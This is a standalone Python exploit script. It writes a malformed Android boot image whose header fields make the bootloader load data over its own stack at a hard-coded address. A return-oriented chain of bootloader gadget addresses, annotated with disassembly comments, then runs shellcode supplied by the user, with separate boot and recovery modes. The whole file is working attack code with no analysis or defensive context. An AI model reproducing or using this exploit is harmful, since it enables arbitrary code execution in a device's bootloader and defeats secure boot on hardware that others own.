#!/usr/bin/env python3
import sys
import struct
from argparse import ArgumentParser

base = 0x46000000

crafted_hdr_sz = 0x70
page_size = 4  # at least 4 for alignment
# NOTE: crafted_hdr_sz bytes before inject_addr become corrupt
# 2 * page_size bytes after inject_addr+inject_sz become corrupt
inject_addr = 0x461416a0
# stack bottom      : 0x46141954
# stack top         : 0x4613f954
# corrupted region  : 0x46141630 - 

inject_sz = 0x200 - crafted_hdr_sz

# 4600A542                 LDMIA           R1, {R1-R3}
# 4601ABD0                 LDMIA           R1, {R4-LR}^

# 4601B028                 LDMFD           SP!, {R0-R3,R12,LR,PC}^     ## ARM

arch_clean_invalidate_cache_range = 0x4601C5A0
fastboot_init = 0x4602A3C1

#RAM:46004EF8                 BLX             R4
#RAM:46004EFA                 ASRS            R1, R0, #0x1F
#RAM:46004EFC                 ADD             SP, SP, #0xC
#RAM:46004EFE                 POP             {R4-R7,PC}


#RAM:46004F1E                 BLX             R1
#RAM:46004F20                 ASRS            R1, R0, #0x1F
#RAM:46004F22                 ADD             SP, SP, #0x14
#RAM:46004F24                 POP             {R4-R7,PC}

def main():
    parser = ArgumentParser()
    parser.add_argument('payload')
    parser.add_argument('-b', '--bootimg')
    parser.add_argument('-m', '--mode', help="Either boot or recovery")
    parser.add_argument('output')
    args = parser.parse_args()

    orig = b""

    if args.bootimg:
        with open(args.bootimg, "rb") as fin:
            orig = fin.read(0x400)
            fin.seek(0x800)
            orig += fin.read()

    hdr = b"ANDROID!"  # magic
    hdr += struct.pack("<II", inject_sz, inject_addr -
                       crafted_hdr_sz + page_size)  # kernel_size, kernel_addr
    # ramdisk_size, ramdisk_addr, second_size, second_addr, tags_addr, page_size, unused, os_version
    hdr += struct.pack("<IIIIIIII", 0, 0, 0, 0, 0, page_size, 0, 0)
    hdr += b"\x00" * 0x10  # name
    hdr += b"bootopt=64S3,32N2,32N2 buildvariant=user"  # cmdline
    hdr += b"\x00" * (crafted_hdr_sz - len(hdr))

    assert len(hdr) == crafted_hdr_sz

    body = b''
    body += struct.pack("<I", 0x40404040)  # R0
    body += struct.pack("<I", arch_clean_invalidate_cache_range)  # R4
    body += struct.pack("<I", 0x42424242)  # R5
    body += struct.pack("<I", 0x4601C7C8)  # PC LDMFD           SP!, {R0-R3,R12,LR,PC}^

    body += struct.pack("<I", inject_addr)  # R0
    body += struct.pack("<I", 0x200-crafted_hdr_sz)  # R1
    body += struct.pack("<I", 0x03030303)  # R2
    body += struct.pack("<I", 0x04040404)  # R3
    body += struct.pack("<I", 0x12121212)  # R12
    # boot mode
    if args.mode == 'boot':
        body += struct.pack("<I", 0xFEEFFEEF)  # LR
        body += struct.pack("<I", 0x46004EF9)  # PC
        body += struct.pack("<I", 0x77000077)
        body += struct.pack("<I", 0x88000088)
        body += struct.pack("<I", 0x99000099)
        body += struct.pack("<I", 0xAA1111AA) # R4
        body += struct.pack("<I", 0xBB1111BB) # R5
        body += struct.pack("<I", 0xBB1111BB) # R6
        body += struct.pack("<I", 0xBB1111BB) # R7
        shellcode_addr = inject_addr + len(body) + 4
        body += struct.pack("<I", shellcode_addr) # PC
    elif args.mode == 'recovery':
        shellcode_addr = inject_addr + len(body) + 40
        body += struct.pack("<I", shellcode_addr)  # LR
        body += struct.pack("<I", arch_clean_invalidate_cache_range)  # PC
        body += struct.pack("<I", 0x77000077)
        body += struct.pack("<I", 0x77000077)
        body += struct.pack("<I", 0x77000077)
        body += struct.pack("<I", 0x77000077)
        body += struct.pack("<I", 0x77000077)
        body += struct.pack("<I", 0x77000077)
        body += struct.pack("<I", 0x77000077)
        body += struct.pack("<I", 0x77000077)
    else:
        raise Exception("Unknown mode")

    print("addr = %#x" % (inject_addr + len(body)), flush=True)

    # shellcode binary
    with open(args.payload, "rb") as fin:
        shellcode = fin.read()
    body += shellcode

    body += b"\x00" * (inject_sz - len(body))

    hdr += body

    hdr += b"\x00" * (0x400 - len(hdr))
    assert len(hdr) == 0x400
    hdr += orig

    with open(args.output, "wb") as fout:
        fout.write(hdr)


if __name__ == "__main__":
    main()
